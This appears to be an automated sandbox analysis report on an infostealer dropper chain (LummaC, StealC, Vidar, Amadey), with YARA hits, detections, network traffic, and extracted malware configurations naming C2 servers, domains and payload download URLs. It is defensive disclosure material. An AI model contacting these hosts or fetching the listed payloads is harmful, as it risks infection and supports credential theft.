Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	Directory queried: C:\Users\user\Documents\FENIVHOIKN
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	Directory queried: C:\Users\user\Documents\NWTVCDUMOB
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	Directory queried: C:\Users\user\Documents\UMMBDNEQBN
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	Directory queried: C:\Users\user\Documents\VLZDGUKUTZ
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	Directory queried: C:\Users\user\Documents\BPMLNOBVSB
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	Directory queried: C:\Users\user\Documents\NWTVCDUMOB
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	Directory queried: C:\Users\user\Documents\UMMBDNEQBN
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	Directory queried: C:\Users\user\Documents\VLZDGUKUTZ
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	Directory queried: C:\Users\user\Documents\WUTJSCBCFX
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	Directory queried: C:\Users\user\Documents\BPMLNOBVSB
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	Directory queried: C:\Users\user\Documents\NWTVCDUMOB
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	Directory queried: C:\Users\user\Documents\UMMBDNEQBN
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	Directory queried: C:\Users\user\Documents\VLZDGUKUTZ
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	Directory queried: C:\Users\user\Documents\WUTJSCBCFX
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	Directory queried: C:\Users\user\Documents\BPMLNOBVSB
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	Directory queried: C:\Users\user\Documents\FENIVHOIKN
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	Directory queried: C:\Users\user\Documents\NWTVCDUMOB
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	Directory queried: C:\Users\user\Documents\VLZDGUKUTZ
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	Directory queried: C:\Users\user\Documents\WUTJSCBCFX
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	Directory queried: C:\Users\user\Documents\NWTVCDUMOB
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	Directory queried: C:\Users\user\Documents\UMMBDNEQBN
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	Directory queried: C:\Users\user\Documents\VLZDGUKUTZ
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	Directory queried: C:\Users\user\Documents\WUTJSCBCFX
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	Directory queried: C:\Users\user\Documents
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	Directory queried: C:\Users\user\Documents\FENIVHOIKN
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	Directory queried: C:\Users\user\Documents\NWTVCDUMOB
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	Directory queried: C:\Users\user\Documents\UMMBDNEQBN
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	Directory queried: C:\Users\user\Documents\WUTJSCBCFX

Shows file infection / information gathering behavior (enumerates multiple directory for files)

Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe

Directory queried: number of queries: 2130

Yara detected Credential Stealer

Source: Yara match	File source: 10.3.e192e43b61.exe.1197b30.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000A.00000003.2624288449.00000000011A4000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.1786821317.0000000001774000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000003.2883370297.000000000111B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000003.2623865515.00000000011A4000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.2582005430.00000000012D7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000003.2663469865.00000000011A5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.1786888167.0000000001775000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000003.2658010814.00000000011A4000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000003.2623816326.0000000001193000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.1786861408.0000000001774000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000003.2605977580.00000000011A4000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000003.2608212064.00000000011A4000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000003.2639670507.00000000011A4000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000003.2663336618.00000000011A5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000003.2623503748.000000000118F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000003.2809274914.0000000001403000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: file.exe PID: 7488, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: K7IHXYTNUQJPI2M9UU0ECLE1K.exe PID: 5460, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: e192e43b61.exe PID: 1420, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: e192e43b61.exe PID: 1340, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: e192e43b61.exe PID: 5744, type: MEMORYSTR

Remote Access Functionality

Yara detected LummaC Stealer

Source: Yara match	File source: Process Memory Space: file.exe PID: 7488, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: e192e43b61.exe PID: 1420, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: e192e43b61.exe PID: 1340, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: e192e43b61.exe PID: 5744, type: MEMORYSTR
Source: Yara match	File source: sslproxydump.pcap, type: PCAP

Yara detected Stealc

Source: Yara match	File source: 32.0.num.exe.860000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 32.2.num.exe.860000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 26.2.b0b9f39429.exe.ba0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.b0b9f39429.exe.ba0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.K7IHXYTNUQJPI2M9UU0ECLE1K.exe.820000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000020.00000002.3015827110.000000000076E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.2750222076.0000000000BA1000.00000040.00000001.01000000.00000011.sdmp, type: MEMORY
Source: Yara match	File source: 0000001A.00000002.2901676931.0000000000BA1000.00000040.00000001.01000000.00000011.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.2751119481.00000000018EE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.2580293430.0000000000821000.00000040.00000001.01000000.00000009.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.2582005430.000000000127E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000020.00000002.3019501243.0000000000861000.00000080.00000001.01000000.00000019.sdmp, type: MEMORY
Source: Yara match	File source: 0000001A.00000003.2852632926.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000003.2709864138.0000000005560000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000020.00000000.2857203948.0000000000861000.00000080.00000001.01000000.00000019.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000003.2142029213.00000000050A0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001A.00000002.2908035174.00000000013EA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: K7IHXYTNUQJPI2M9UU0ECLE1K.exe PID: 5460, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: b0b9f39429.exe PID: 8148, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: b0b9f39429.exe PID: 3916, type: MEMORYSTR
Source: Yara match	File source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\num[1].exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\1001608001\num.exe, type: DROPPED
Source: Yara match	File source: dump.pcap, type: PCAP

Yara detected Vidar stealer

Source: Yara match

File source: Process Memory Space: K7IHXYTNUQJPI2M9UU0ECLE1K.exe PID: 5460, type: MEMORYSTR

Contains functionality to open a port and listen for incoming connection (possibly a backdoor)

Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe	Code function: 6_2_6C6F0C40 sqlite3_bind_zeroblob,	6_2_6C6F0C40
Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe	Code function: 6_2_6C6F0D60 sqlite3_bind_parameter_name,	6_2_6C6F0D60
Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe	Code function: 6_2_6C618EA0 sqlite3_clear_bindings,	6_2_6C618EA0
Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe	Code function: 6_2_6C6F0B40 sqlite3_bind_value,sqlite3_bind_int64,sqlite3_bind_double,sqlite3_bind_zeroblob,	6_2_6C6F0B40
Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe	Code function: 6_2_6C616410 bind,WSAGetLastError,	6_2_6C616410
Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe	Code function: 6_2_6C616070 PR_Listen,	6_2_6C616070
Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe	Code function: 6_2_6C61C050 sqlite3_bind_parameter_index,strlen,strncmp,strncmp,	6_2_6C61C050
Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe	Code function: 6_2_6C61C030 sqlite3_bind_parameter_count,	6_2_6C61C030
Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe	Code function: 6_2_6C6160B0 listen,WSAGetLastError,	6_2_6C6160B0
Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe	Code function: 6_2_6C5A22D0 sqlite3_bind_blob,	6_2_6C5A22D0
Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe	Code function: 6_2_6C6163C0 PR_Bind,	6_2_6C6163C0

Screenshots

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Network Map

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Contacted Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
185.215.113.43	unknown	Portugal	206894	WHOLESALECONNECTIONSNL	true
104.21.95.91	crisiwarny.store	United States	13335	CLOUDFLARENETUS	true
185.215.113.37	unknown	Portugal	206894	WHOLESALECONNECTIONSNL	false
185.215.113.206	unknown	Portugal	206894	WHOLESALECONNECTIONSNL	true
185.215.113.16	unknown	Portugal	206894	WHOLESALECONNECTIONSNL	false
35.190.72.216	prod.classify-client.prod.webservices.mozgcp.net	United States	15169	GOOGLEUS	false

Private

IP
127.0.0.1

Contacted Domains

Name	IP	Active
prod.classify-client.prod.webservices.mozgcp.net	35.190.72.216	true
crisiwarny.store	104.21.95.91	true
presticitpo.store	unknown	unknown

Contacted URLs

Name	Malicious	Reputation
http://185.215.113.206/	true	unknown
fadehairucw.store	true	unknown
founpiuer.store	true	unknown
http://185.215.113.206/0d60be0de163924d/softokn3.dll	true	unknown
http://185.215.113.206/0d60be0de163924d/sqlite3.dll	true	unknown

AV Detection

Antivirus / Scanner detection for submitted sample

Source: file.exe

Avira: detected

Antivirus detection for dropped file

Source: C:\Users\user\AppData\Local\Temp\UDUFEWZ4SDVC5XI69Q6Z0RB48.exe	Avira: detection malicious, Label: TR/Crypt.TPM.Gen
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\random[1].exe	Avira: detection malicious, Label: TR/Crypt.TPM.Gen
Source: C:\Users\user\AppData\Local\Temp\1001608001\num.exe	Avira: detection malicious, Label: TR/AD.Stealc.bkskc
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\random[1].exe	Avira: detection malicious, Label: TR/Crypt.TPM.Gen
Source: C:\Users\user\AppData\Local\Temp\C2C3IJZ3P2FG16GF7FNFB7ECDJXKRT.exe	Avira: detection malicious, Label: TR/Crypt.TPM.Gen
Source: C:\Users\user\AppData\Local\Temp\1001606001\b0b9f39429.exe	Avira: detection malicious, Label: TR/Crypt.TPM.Gen
Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe	Avira: detection malicious, Label: TR/Crypt.TPM.Gen
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\num[1].exe	Avira: detection malicious, Label: TR/AD.Stealc.bkskc
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	Avira: detection malicious, Label: TR/Crypt.TPM.Gen
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Avira: detection malicious, Label: TR/Crypt.TPM.Gen
Source: C:\Users\user\AppData\Local\Temp\6IF65DE3AL7UEH5E4W09DIZ.exe	Avira: detection malicious, Label: TR/Crypt.TPM.Gen

Found malware configuration

Source: 00000007.00000003.2308287602.0000000004F40000.00000004.00001000.00020000.00000000.sdmp	Malware Configuration Extractor: Amadey {"C2 url": "185.215.113.43/Zu7JuNko/index.php", "Version": "4.42", "Install Folder": "abc3bc1985", "Install File": "skotes.exe"}
Source: 26.2.b0b9f39429.exe.ba0000.0.unpack	Malware Configuration Extractor: StealC {"C2 url": "http://185.215.113.206/e2b1563c6670f193.php", "Botnet": "puma"}
Source: 26.2.b0b9f39429.exe.ba0000.0.unpack	Malware Configuration Extractor: Vidar {"C2 url": "http://185.215.113.206/e2b1563c6670f193.php", "Botnet": "puma"}
Source: e192e43b61.exe.1340.11.memstrmin	Malware Configuration Extractor: LummaC {"C2 url": ["crisiwarny.store", "scriptyprefej.store", "navygenerayk.store", "necklacedmny.store", "presticitpo.store", "thumbystriw.store", "fadehairucw.store", "founpiuer.store"], "Build id": "4SD0y4--legendaryy"}

Multi AV Scanner detection for domain / URL

Source: http://185.215.113.16/off/def.exe

Virustotal: Detection: 19%

Perma Link

Multi AV Scanner detection for dropped file

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\num[1].exe	ReversingLabs: Detection: 82%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\random[1].exe	ReversingLabs: Detection: 47%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\random[1].exe	ReversingLabs: Detection: 26%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\random[1].exe	ReversingLabs: Detection: 31%
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	ReversingLabs: Detection: 31%
Source: C:\Users\user\AppData\Local\Temp\1001606001\b0b9f39429.exe	ReversingLabs: Detection: 47%
Source: C:\Users\user\AppData\Local\Temp\1001607001\5e28f62265.exe	ReversingLabs: Detection: 26%
Source: C:\Users\user\AppData\Local\Temp\1001608001\num.exe	ReversingLabs: Detection: 82%
Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe	ReversingLabs: Detection: 47%
Source: C:\Users\user\AppData\Local\Temp\UDUFEWZ4SDVC5XI69Q6Z0RB48.exe	ReversingLabs: Detection: 47%

Multi AV Scanner detection for submitted file

Source: file.exe	Virustotal: Detection: 42%			Perma Link
Source: file.exe	ReversingLabs: Detection: 31%

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for dropped file

Source: C:\Users\user\AppData\Local\Temp\1001607001\5e28f62265.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\UDUFEWZ4SDVC5XI69Q6Z0RB48.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\random[1].exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\random[1].exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\1001608001\num.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\random[1].exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\C2C3IJZ3P2FG16GF7FNFB7ECDJXKRT.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\1001606001\b0b9f39429.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\num[1].exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\1001605001\e192e43b61.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\DHMGC7TXSIK31JTC83MV8ND88A.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\6IF65DE3AL7UEH5E4W09DIZ.exe	Joe Sandbox ML: detected

Machine Learning detection for sample

Source: file.exe

Joe Sandbox ML: detected

Uses Microsoft's Enhanced Cryptographic Provider

Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe	Code function: 6_2_6C66A9A0 PK11SDR_Decrypt,PORT_NewArena_Util,SEC_QuickDERDecodeItem_Util,PORT_FreeArena_Util,SECITEM_ZfreeItem_Util,PK11_GetInternalKeySlot,PK11_Authenticate,PORT_FreeArena_Util,PK11_ListFixedKeysInSlot,SECITEM_ZfreeItem_Util,PK11_FreeSymKey,PK11_FreeSymKey,PORT_FreeArena_Util,PK11_FreeSymKey,SECITEM_ZfreeItem_Util,	6_2_6C66A9A0
Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe	Code function: 6_2_6C664440 PK11_PrivDecrypt,	6_2_6C664440
Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe	Code function: 6_2_6C634420 SECKEY_DestroyEncryptedPrivateKeyInfo,memset,PORT_FreeArena_Util,SECITEM_ZfreeItem_Util,SECITEM_ZfreeItem_Util,SECITEM_ZfreeItem_Util,free,	6_2_6C634420
Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe	Code function: 6_2_6C6644C0 PK11_PubEncrypt,	6_2_6C6644C0
Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe	Code function: 6_2_6C6B25B0 PK11_Encrypt,memcpy,PR_SetError,PK11_Encrypt,	6_2_6C6B25B0
Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe	Code function: 6_2_6C648670 PK11_ExportEncryptedPrivKeyInfo,	6_2_6C648670
Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe	Code function: 6_2_6C66A650 PK11SDR_Encrypt,PORT_NewArena_Util,PK11_GetInternalKeySlot,PK11_Authenticate,SECITEM_ZfreeItem_Util,TlsGetValue,EnterCriticalSection,PR_Unlock,PK11_CreateContextBySymKey,PK11_GetBlockSize,PORT_Alloc_Util,memcpy,SECITEM_ZfreeItem_Util,PORT_FreeArena_Util,SECITEM_ZfreeItem_Util,PK11_FreeSymKey,PORT_ArenaAlloc_Util,PK11_CipherOp,SEC_ASN1EncodeItem_Util,SECITEM_ZfreeItem_Util,PORT_FreeArena_Util,PK11_DestroyContext,	6_2_6C66A650
Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe	Code function: 6_2_6C64E6E0 PK11_AEADOp,TlsGetValue,EnterCriticalSection,PORT_Alloc_Util,PK11_Encrypt,PORT_Alloc_Util,memcpy,memcpy,PR_SetError,PR_SetError,PR_Unlock,PR_SetError,PR_Unlock,PK11_Decrypt,PR_GetCurrentThread,PK11_Decrypt,PK11_Encrypt,memcpy,memcpy,PR_SetError,free,	6_2_6C64E6E0
Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe	Code function: 6_2_6C68A730 SEC_PKCS12AddCertAndKey,PORT_ArenaMark_Util,PORT_ArenaMark_Util,PK11_FindKeyByAnyCert,SECKEY_DestroyPrivateKey,PORT_ArenaAlloc_Util,PR_SetError,PR_SetError,PK11_GetInternalKeySlot,PK11_FindKeyByAnyCert,SECKEY_DestroyPrivateKey,PORT_ArenaAlloc_Util,SECKEY_DestroyEncryptedPrivateKeyInfo,strlen,PR_SetError,PORT_FreeArena_Util,PORT_FreeArena_Util,PORT_ArenaAlloc_Util,PR_SetError,	6_2_6C68A730
Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe	Code function: 6_2_6C690180 SECMIME_DecryptionAllowed,SECOID_GetAlgorithmTag_Util,	6_2_6C690180
Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe	Code function: 6_2_6C6643B0 PK11_PubEncryptPKCS1,PR_SetError,	6_2_6C6643B0
Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe	Code function: 6_2_6C687C00 SEC_PKCS12DecoderImportBags,PR_SetError,NSS_OptionGet,CERT_DestroyCertificate,SECITEM_ZfreeItem_Util,PR_SetError,SECKEY_DestroyPublicKey,SECITEM_ZfreeItem_Util,PR_SetError,SECKEY_DestroyPublicKey,SECITEM_ZfreeItem_Util,PR_SetError,SECOID_FindOID_Util,SECITEM_ZfreeItem_Util,SECKEY_DestroyPublicKey,SECOID_GetAlgorithmTag_Util,SECITEM_CopyItem_Util,PK11_ImportEncryptedPrivateKeyInfoAndReturnKey,SECITEM_ZfreeItem_Util,SECKEY_DestroyPublicKey,PK11_ImportPublicKey,SECOID_FindOID_Util,	6_2_6C687C00
Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe	Code function: 6_2_6C647D60 PK11_ImportEncryptedPrivateKeyInfoAndReturnKey,SECOID_FindOID_Util,SECOID_FindOIDByTag_Util,PK11_PBEKeyGen,PK11_GetPadMechanism,PK11_UnwrapPrivKey,PK11_FreeSymKey,SECITEM_ZfreeItem_Util,PK11_PBEKeyGen,SECITEM_ZfreeItem_Util,PK11_FreeSymKey,PK11_ImportPublicKey,SECKEY_DestroyPublicKey,	6_2_6C647D60
Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe	Code function: 6_2_6C68BD30 SEC_PKCS12IsEncryptionAllowed,NSS_GetAlgorithmPolicy,NSS_GetAlgorithmPolicy,NSS_GetAlgorithmPolicy,NSS_GetAlgorithmPolicy,NSS_GetAlgorithmPolicy,NSS_GetAlgorithmPolicy,NSS_GetAlgorithmPolicy,NSS_GetAlgorithmPolicy,NSS_GetAlgorithmPolicy,	6_2_6C68BD30
Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe	Code function: 6_2_6C689EC0 SEC_PKCS12CreateUnencryptedSafe,PORT_ArenaMark_Util,PORT_ArenaAlloc_Util,PR_SetError,PR_SetError,SEC_PKCS7DestroyContentInfo,	6_2_6C689EC0
Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe	Code function: 6_2_6C663FF0 PK11_PrivDecryptPKCS1,	6_2_6C663FF0
Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe	Code function: 6_2_6C669840 NSS_Get_SECKEY_EncryptedPrivateKeyInfoTemplate,	6_2_6C669840
Source: C:\Users\user\AppData\Local\Temp\K7IHXYTNUQJPI2M9UU0ECLE1K.exe	Code function: 6_2_6C663850 PK11_Encrypt,TlsGetValue,EnterCriticalSection,SEC_PKCS12SetPreferredCipher,PR_Unlock,TlsGetValue,EnterCriticalSection,PR_Unlock,TlsGetValue,EnterCriticalSection,PR_Unlock,PR_Unlock,TlsGetValue,EnterCriticalSection,PR_Unlock,PR_SetError,	6_2_6C663850

Uses 32bit PE files

Source: file.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: unknown	HTTPS traffic detected: 104.21.95.91:443 -> 192.168.2.4:49730 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.95.91:443 -> 192.168.2.4:49731 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.95.91:443 -> 192.168.2.4:49732 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.95.91:443 -> 192.168.2.4:49733 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.95.91:443 -> 192.168.2.4:49734 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.95.91:443 -> 192.168.2.4:49735 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.95.91:443 -> 192.168.2.4:49736 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.95.91:443 -> 192.168.2.4:49740 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.95.91:443 -> 192.168.2.4:49916 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.95.91:443 -> 192.168.2.4:49927 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.95.91:443 -> 192.168.2.4:49936 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.95.91:443 -> 192.168.2.4:49945 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.95.91:443 -> 192.168.2.4:49956 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.95.91:443 -> 192.168.2.4:49968 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.95.91:443 -> 192.168.2.4:49981 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.95.91:443 -> 192.168.2.4:49985 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.95.91:443 -> 192.168.2.4:49994 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.95.91:443 -> 192.168.2.4:50017 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.95.91:443 -> 192.168.2.4:50020 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.95.91:443 -> 192.168.2.4:50032 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.95.91:443 -> 192.168.2.4:50033 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.95.91:443 -> 192.168.2.4:50034 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.95.91:443 -> 192.168.2.4:50035 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.95.91:443 -> 192.168.2.4:50037 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.95.91:443 -> 192.168.2.4:50036 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.95.91:443 -> 192.168.2.4:50040 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.95.91:443 -> 192.168.2.4:50041 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.95.91:443 -> 192.168.2.4:50044 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.95.91:443 -> 192.168.2.4:50053 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.95.91:443 -> 192.168.2.4:50052 version: TLS 1.2
